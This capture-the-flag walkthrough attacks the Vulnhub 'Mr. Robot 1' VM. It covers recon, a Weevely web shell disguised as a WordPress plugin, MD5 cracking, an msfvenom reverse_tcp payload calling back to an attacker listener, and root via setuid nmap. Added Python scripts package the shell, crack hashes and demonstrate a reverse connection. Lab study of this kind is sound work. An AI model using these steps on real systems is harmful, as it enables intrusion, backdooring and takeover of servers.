Today I am taking a look at a Vulnhub VM based on the show Mr. Robot. Fittingly, the name of the VM is Mr. Robot 1. The goal is to find three keys hidden in different locations, and the hunt gets progressively more difficult with each key. This box is rated beginner-intermediate; you don’t have to do anything hardcore to beat it.
Let’s start, shall we?
Test lab environment
When playing games such as this I use my own test lab. I had been using VMware and Kali Linux for years, but due to hardware and software issues I decided to switch everything out in favor of VirtualBox and Parrot OS. I’ll do the hacking part from Parrot exclusively. I recommend setting up a similar environment before playing.
Finding the most basic information
The very first thing I had to do was to uncover the target’s IP address. Luckily my test lab has only a few machines in it, so finding the target was a breeze using this command:
Finding open ports
I knew very little about this target. A great way to learn more about a target is to see which ports are open using Nmap. Note that the SYN scan (-sS) needs root, and a full 65535-port TCP plus UDP scan with -A takes a long time even at -T4, so expect to wait:
$ nmap -p1-65535 -A -T4 -sS -sU target_ip
Nmap found that ports 80 and 443 were open.
Investigating the web environment
Still not knowing much about the target I needed to find out more. Nikto is a great tool for learning about the target’s web environment, so I ran it next:
$ nikto -output MrRobot.xml -host target_ip
From Nikto’s output I learnt that:
- WordPress is installed on the server
- license.txt is present
- robots.txt is present
- … and the server runs Apache
Those .txt files looked pretty interesting, so I downloaded them for closer inspection:
$ wget http://target_ip/license.txt
$ wget http://target_ip/robots.txt
license.txt had a Base64 encoded string in it. I quickly decoded it while still in the terminal:
$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 --decode
The string decodes to elliot:ER28-0652, which looks very much like a username:password pair.
robots.txt contained two interesting entries. First, the key to level 1. Second, a dictionary of some sort. Downloading them both for later use:
$ wget http://target_ip/fsociety.dic
$ wget http://target_ip/key-1-of-3.txt
Key 1 retrieved!
Finding basic information about the WordPress installation using WPScan:
$ wpscan --url target_ip
WPScan reported:
- robots.txt (which I had already downloaded)
- the WordPress version
Trying to enumerate the WordPress users:
$ wpscan --enumerate u[0-10000] --url target_ip
This yielded no results, and neither did trying the username elliot directly (which I had found earlier).
Plugins are a great source of ways in, and they often leak interesting information too. Enumerating lets me find out which plugins the site uses:
$ wpscan --url target_ip --enumerate p
WPScan spat out plenty of useful information but frankly, I wasn’t in the mood to go any further with it. Instead I went to wp-login and logged in with the credentials decoded from license.txt – instant success!
Looked around. It’s a plain WordPress installation. I decided to try getting a shell; being closer to the core is more interesting.
The first thing that struck me was that a shell made with Weevely would be killer (12345 is the shell’s connection password):
$ weevely generate 12345 shelly.php
The plan is to sneak the shell onto the server using the plugin installation tool in WordPress. In order to do so, the shell must be dressed up to look like a proper plugin: WordPress only recognises a PHP file as a plugin if it starts with a plugin header comment. Adding the header to the beginning of shelly.php:
<?php
/*
Plugin Name: Shelly
Plugin URI: http://localhost
Description: Bla Bla Bla
Author: Pingmoose
Version: 1.0.1
Author URI: http://localhost
*/
... PHP_SHELL_CODE ...
?>
Making it a plugin package for WordPress’s plugin installation tool by zipping it:
$ zip shelly.zip shelly.php
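The header-and-zip routine above is easy to get slightly wrong (two <?php tags, a file at the wrong depth in the archive), so here is the packaging step as a small script. This is an added example, not code from the original post or from Weevely; the plugin name, author, description and the harmless sample PHP body are assumptions for the demo, and any real shell file would be passed in its place.

```python
"""Wrap a PHP file as a WordPress plugin ZIP (added example, not the post's tooling).

The WordPress plugin installer accepts a ZIP containing at least one PHP file
that carries a plugin header comment; after installation the file is served
from wp-content/plugins/<dir>/<file>.php, which is the URL Weevely connects to.
Plugin name, author, description and the sample PHP body are assumptions.
"""
import io
import zipfile

HEADER_TEMPLATE = """<?php
/*
Plugin Name: {name}
Plugin URI: http://localhost
Description: {description}
Author: {author}
Version: 1.0.1
Author URI: http://localhost
*/
"""


def add_plugin_header(php_body: str, name: str, author: str = "Pingmoose",
                      description: str = "Bla Bla Bla") -> str:
    """Prepend the header. A leading <?php in the body is dropped so the header
    and the body form one PHP block instead of two."""
    body = php_body.lstrip()
    if body.startswith("<?php"):
        body = body[len("<?php"):].lstrip("\r\n")
    return HEADER_TEMPLATE.format(name=name, author=author,
                                  description=description) + body


def build_plugin_zip(php_body: str, slug: str) -> bytes:
    """Return ZIP bytes laid out as <slug>/<slug>.php. WordPress also accepts a
    flat ZIP (it names the plugin directory after the archive), which is what
    the post did; an explicit directory makes the final URL predictable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php",
                    add_plugin_header(php_body, slug.capitalize()))
    return buf.getvalue()


def list_zip(data: bytes) -> list:
    """Names inside the archive, for checking the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def read_plugin_file(data: bytes, slug: str) -> str:
    """Contents of the packaged PHP file, for checking the header."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(f"{slug}/{slug}.php").decode()


if __name__ == "__main__":
    # Constructed stand-in for shelly.php; harmless on purpose.
    sample = "<?php\necho 'plugin loaded';\n"
    data = build_plugin_zip(sample, "shelly")
    with open("shelly.zip", "wb") as fh:
        fh.write(data)
    print(list_zip(data))
    print(read_plugin_file(data, "shelly"))
```

Run it with the Weevely output in place of the sample body, upload the resulting shelly.zip through the plugin installer, and the file is reachable at wp-content/plugins/shelly/shelly.php without even activating the plugin, since WordPress serves files under wp-content directly.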
Then installed it through the WordPress plugin installer. After that, connected Weevely to the shell:
$ weevely http://target_ip/wp-content/plugins/shelly/shelly.php 12345
While in shell:
$ cd /home
$ ls
$ cd /home/robot
$ ls
This led to the discovery of key-2-of-3.txt. I couldn’t read it because the web server’s user lacks permission on it. However, a file named password.raw-md5 in the same directory was readable.
The filename clearly stated I had to deal with an MD5 hash. I could have gone lazy and thrown it at an online lookup or rainbow table; odds are it had already been cracked. But that would be too easy, wouldn’t it? Instead I chose to crack it using the RockYou wordlist and the magnificent Hashcat tool. Mode -m 0 is raw MD5, and -a 0 is the straight dictionary attack (hashcat’s -a 1 is the combinator mode, which expects two wordlists). key2passwordhash.txt holds the hash copied out of password.raw-md5:
$ cp /usr/share/wordlists/rockyou.txt.gz Hacking/
$ gunzip rockyou.txt.gz
$ hashcat -m 0 -a 0 key2passwordhash.txt ~/Hacking/rockyou.txt
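To make the difference between hashcat’s attack modes concrete, here is the same dictionary attack written out in Python. This is an added example, not the post’s or hashcat’s code; the mini wordlist and the hashes are constructed for the demo and are not the contents of the VM’s password.raw-md5.

```python
"""Dictionary attack on a raw MD5 hash, in hashcat's terms (added example).

-a 0 (straight) hashes each wordlist line as-is; -a 1 (combinator) hashes
left_word + right_word for every pair from two lists, which is why it needs
two wordlists. The wordlist and target hashes below are constructed.
"""
import hashlib
from itertools import product
from typing import Iterable, Iterator, Optional


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def straight(words: Iterable[str]) -> Iterator[str]:
    """hashcat -a 0: every candidate is one wordlist line."""
    for w in words:
        yield w


def combinator(left: Iterable[str], right: Iterable[str]) -> Iterator[str]:
    """hashcat -a 1: every candidate is left_word + right_word."""
    for l, r in product(list(left), list(right)):
        yield l + r


def crack_md5(target_hex: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose MD5 matches, or None."""
    target = target_hex.strip().lower()
    for cand in candidates:
        if md5_hex(cand) == target:
            return cand
    return None


def load_hash_file(text: str) -> str:
    """password.raw-md5 is a single line; tolerate a user:hash line too."""
    line = text.strip().splitlines()[0]
    return line.split(":")[-1].strip()


# Constructed sample wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "password", "mrrobot", "elliot", "fsociety"]


if __name__ == "__main__":
    h_single = md5_hex("fsociety")
    print("straight:", crack_md5(h_single, straight(WORDLIST)))
    h_pair = md5_hex("elliotfsociety")
    print("straight:", crack_md5(h_pair, straight(WORDLIST)))
    print("combinator:", crack_md5(h_pair, combinator(WORDLIST, WORDLIST)))
```

The second target only falls to the combinator generator, which is the point of choosing the right -a mode: with a single wordlist and -a 1, hashcat has nothing to combine and simply does not try the candidates you think it is trying.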
Maybe I could su - robot using this password. Nope: Weevely’s shell is not an interactive TTY, and su refuses to prompt for a password without one. I needed a better shell.
Creating a second shell
$ msfvenom -l | grep php
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=my_ip LPORT=7771 -f raw -o meterpreter.php
(LHOST is the attacking machine’s address, the one the payload connects back to, so it must match the listener below.)
Added WordPress headers, zipped it and installed it – the same routine as earlier.
Listener setup in Metasploit. The handler’s payload has to match what msfvenom generated, or the connection will not stage into a Meterpreter session:
$ msfconsole
msf > use exploit/multi/handler
msf > set PAYLOAD php/meterpreter/reverse_tcp
msf > set LHOST my_ip
msf > set LPORT 7771
msf > run
In order to make the shell connect back to my attacking computer I had to manually visit:
Back in Metasploit:
Then spawned a proper shell so I could do more work. From the Meterpreter session, drop to a system shell with shell and upgrade it to a TTY with Python:
$ python -c 'import pty;pty.spawn("/bin/bash")'
Waited for the shell to come alive, then:
$ cd /home/robot
$ su - robot (using the password I cracked from the MD5 file)
$ cat key-2-of-3.txt
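The reverse_tcp plumbing used above, as an added example in Python rather than Metasploit’s own code: the handler side binds LHOST:LPORT and waits, and the payload side connects back to it, runs a command and ships the output over the socket. That direction is why LHOST in the msfvenom command must be the attacker’s address and must match the listener. The loopback address, the OS-chosen port and the command run are constructed for the demo.

```python
"""Who listens and who connects in a reverse_tcp payload (added example).

Handler = attacker side (what exploit/multi/handler does). Payload = target
side (what the msfvenom-generated PHP does). Both run here on loopback in one
process so the exchange can be observed offline; the command is constructed.
"""
import socket
import subprocess
import threading


def start_handler(host: str = "127.0.0.1", port: int = 0):
    """Bind and listen like the handler would; return (server socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))          # port 0: let the OS pick one for the demo
    srv.listen(1)
    return srv, srv.getsockname()[1]


def payload_connect_back(lhost: str, lport: int, command: str) -> None:
    """Target side: connect to LHOST:LPORT, run one command, send its output.
    LHOST/LPORT are exactly the values baked into the msfvenom payload."""
    with socket.create_connection((lhost, lport)) as s:
        out = subprocess.run(command, shell=True, capture_output=True,
                             text=True).stdout
        s.sendall(out.encode())


def run_exchange(command: str = "echo constructed-output") -> str:
    """Start the handler, fire the payload, return what the handler received."""
    srv, port = start_handler()
    worker = threading.Thread(target=payload_connect_back,
                              args=("127.0.0.1", port, command))
    worker.start()
    conn, _peer = srv.accept()       # blocks until the payload connects back
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:                 # payload closed the socket: output complete
            break
        chunks.append(data)
    conn.close()
    srv.close()
    worker.join()
    return b"".join(chunks).decode()


if __name__ == "__main__":
    print(run_exchange("id"))
```

Swap the loopback address for the attacker’s real IP and the payload side for the PHP file, and the structure is the same as the Metasploit setup above: if LHOST were the target’s own address, the payload would try to connect to itself and the handler would sit waiting forever.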
Still in my spawned shell, I tried to find a way to become root.
Finding programs that can be used for escalation
$ find / -perm +6000 2> /dev/null
(The +6000 form lists files with the setuid or setgid bit set; on current GNU find the spelling is -perm /6000, the older + form having been removed.)
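The same enumeration in Python, as an added example rather than the post’s command, so the filtering logic is visible: walk the tree with lstat (symlinks are not followed), keep regular files with the setuid or setgid bit, and cross-check the basenames against a small constructed list of binaries known to offer a shell escape. The demo tree, the file names and the candidate list are assumptions for this example.

```python
"""Find setuid/setgid files and flag known escalation candidates (added example).

Equivalent of `find / -perm /6000 -type f`. KNOWN_ESCAPES is a small
constructed sample of GTFOBins-style names (nmap's --interactive mode is the
one that matters on this VM); the demo tree is constructed in a temp dir.
"""
import os
import stat
import tempfile
from typing import List, Tuple

# Constructed sample; extend from a proper reference for real use.
KNOWN_ESCAPES = {"nmap", "vim", "vi", "find", "bash", "sh", "python",
                 "perl", "less", "more", "awk"}


def find_setid(root: str) -> List[Tuple[str, int]]:
    """Return (path, permission bits) for regular files with setuid or setgid set."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                     # unreadable entry, like 2>/dev/null
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, stat.S_IMODE(st.st_mode)))
    return sorted(hits)


def flag_candidates(hits: List[Tuple[str, int]]) -> List[str]:
    """Paths whose basename is on the known-escape list."""
    return [p for p, _mode in hits if os.path.basename(p) in KNOWN_ESCAPES]


def make_demo_tree() -> str:
    """Constructed stand-in for the target filesystem: a setuid 'nmap', a
    setgid 'wrapper' and a plain 'notes' file under usr/local/bin."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    bindir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bindir)
    for name, mode in (("nmap", 0o4755), ("notes", 0o644), ("wrapper", 0o2755)):
        path = os.path.join(bindir, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    demo_root = make_demo_tree()
    found = find_setid(demo_root)
    for path, mode in found:
        print(f"{mode:04o} {path}")
    print("candidates:", flag_candidates(found))
```

On a real box run find_setid("/") as the low-privileged user; the flagged list is the short list to check against a shell-escape reference before trying anything, and the permission bits tell you whether the escape gives you root (setuid, 4xxx) or just a group (setgid, 2xxx).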
Found an old, setuid-root version of nmap at /usr/local/bin/nmap. Old nmap releases (up to 5.21) have an --interactive mode in which a line starting with ! is passed to the shell, so !sh gives a shell that keeps nmap’s root privileges:
$ /usr/local/bin/nmap --interactive
$ !sh
$ whoami
$ cd /root; ls
$ cat Key-3-of-3.txt